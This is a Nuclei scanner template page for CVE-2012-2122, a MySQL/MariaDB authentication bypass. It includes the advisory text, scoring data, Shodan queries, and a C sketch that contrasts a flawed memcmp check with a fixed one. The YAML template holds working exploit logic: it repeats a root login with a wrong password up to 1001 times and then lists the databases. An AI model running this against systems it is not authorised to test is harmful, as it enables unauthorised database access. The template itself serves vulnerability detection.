MySQL - Authentication Bypass
ID: CVE-2012-2122
Severity: medium
Author: pussycat0x
Tags: cve,cve2012,js,enum,network,mssql,fuzz,oracle
Description
sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24, and 5.6.x before 5.6.6, and MariaDB 5.1.x before 5.1.62, 5.2.x before 5.2.12, 5.3.x before 5.3.6, and 5.5.x before 5.5.23, when running in certain environments with certain implementations of the memcmp function, allows remote attackers to bypass authentication by repeatedly authenticating with the same incorrect password, which eventually causes a token comparison to succeed due to an improperly-checked return value.
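The description attributes the bypass to an improperly checked memcmp return value. The C sketch below is an added example, not code from MySQL, MariaDB or the template author; it models that flaw class beside the hardened check, and wide_memcmp, the one-byte my_bool and the sample tokens are assumptions constructed for illustration.

```c
#include <stddef.h>
#include <stdio.h>

typedef char my_bool; /* one-byte boolean (assumption of this model) */
typedef int (*cmp_fn)(const unsigned char *, const unsigned char *, size_t);

/* Hypothetical memcmp that compares two bytes at a time. The C standard only
   fixes the sign of the result, so values outside -128..127 are legal. */
static int wide_memcmp(const unsigned char *a, const unsigned char *b, size_t n)
{
    size_t i = 0;
    for (; i + 2 <= n; i += 2) {
        int wa = (a[i] << 8) | a[i + 1];
        int wb = (b[i] << 8) | b[i + 1];
        if (wa != wb)
            return wa - wb;
    }
    return i < n ? a[i] - b[i] : 0;
}

/* Flawed: narrowing the int to one byte keeps (on common compilers) only its
   low 8 bits, so a nonzero result such as -256 becomes 0: "tokens match". */
static my_bool mismatch_narrowed(cmp_fn cmp, const unsigned char *x,
                                 const unsigned char *y, size_t n)
{
    return (my_bool)cmp(x, y, n);
}

/* Hardened: reduce the result to 0 or 1 before it is narrowed. */
static my_bool mismatch_checked(cmp_fn cmp, const unsigned char *x,
                                const unsigned char *y, size_t n)
{
    return cmp(x, y, n) != 0;
}

/* Constructed sample tokens, not real scramble values. */
static const unsigned char expected[4] = {0x10, 0x22, 0x33, 0x44};
static const unsigned char wrong_a[4]  = {0x11, 0x22, 0x33, 0x44};
static const unsigned char wrong_b[4]  = {0x10, 0x23, 0x33, 0x44};

int main(void)
{
    printf("wrong_a narrowed=%d checked=%d\n",
           mismatch_narrowed(wide_memcmp, expected, wrong_a, 4),
           mismatch_checked(wide_memcmp, expected, wrong_a, 4));
    printf("wrong_b narrowed=%d checked=%d\n",
           mismatch_narrowed(wide_memcmp, expected, wrong_b, 4),
           mismatch_checked(wide_memcmp, expected, wrong_b, 4));
    return 0;
}
```

The narrowed check reports no mismatch for wrong_a even though the tokens differ, while the checked form flags both wrong tokens.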
YAML Source
id: CVE-2012-2122

info:
  name: MySQL - Authentication Bypass
  author: pussycat0x
  severity: medium
  description: |
    sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24, and 5.6.x before 5.6.6, and MariaDB 5.1.x before 5.1.62, 5.2.x before 5.2.12, 5.3.x before 5.3.6, and 5.5.x before 5.5.23, when running in certain environments with certain implementations of the memcmp function, allows remote attackers to bypass authentication by repeatedly authenticating with the same incorrect password, which eventually causes a token comparison to succeed due to an improperly-checked return value.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/mysql/CVE-2012-2122
    - http://kb.askmonty.org/en/mariadb-5162-release-notes/
    - http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00007.html
    - http://security.gentoo.org/glsa/glsa-201308-06.xml
    - http://securitytracker.com/id?1027143
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:H/Au:N/C:P/I:P/A:P
    cvss-score: 5.1
    cve-id: CVE-2012-2122
    cwe-id: CWE-287
    epss-score: 0.9681
    epss-percentile: 0.99685
    cpe: cpe:2.3:a:oracle:mysql:5.1.51:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: oracle
    product: mysql
    shodan-query:
      - "product:\"MySQL\""
      - product:"mysql"
  tags: cve,cve2012,js,enum,network,mssql,fuzz,oracle

javascript:
  - pre-condition: |
      isPortOpen(Host,Port);
    code: |
      const mysql = require('nuclei/mysql');
      const client = new mysql.MySQLClient;
      for (let i = 1; i <= 1001; i++) {
        try {
          const connected = client.ExecuteQuery(Host, Port, User, Pass, Query);
          Export(connected);
          break;
        } catch {
          // error
        }
      }

    args:
      Host: "{{Host}}"
      Port: 3306
      User: "root"
      Pass: "wrong"
      Query: "show databases;"

    matchers:
      - type: dsl
        dsl:
          - "success == true"

    extractors:
      - type: json
        part: response
        json:
          - .Rows[] | .Database
# digest: 490a00463044022002610f47c6a75bd7e978425f0a1f570fd29702b7a499577eb9c22c5167d461b102205109b74e774d69d3c33463a4e0bfbeb80b24f1923dc16d38431adb0d55941752:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "javascript/cves/2012/CVE-2012-2122.yaml"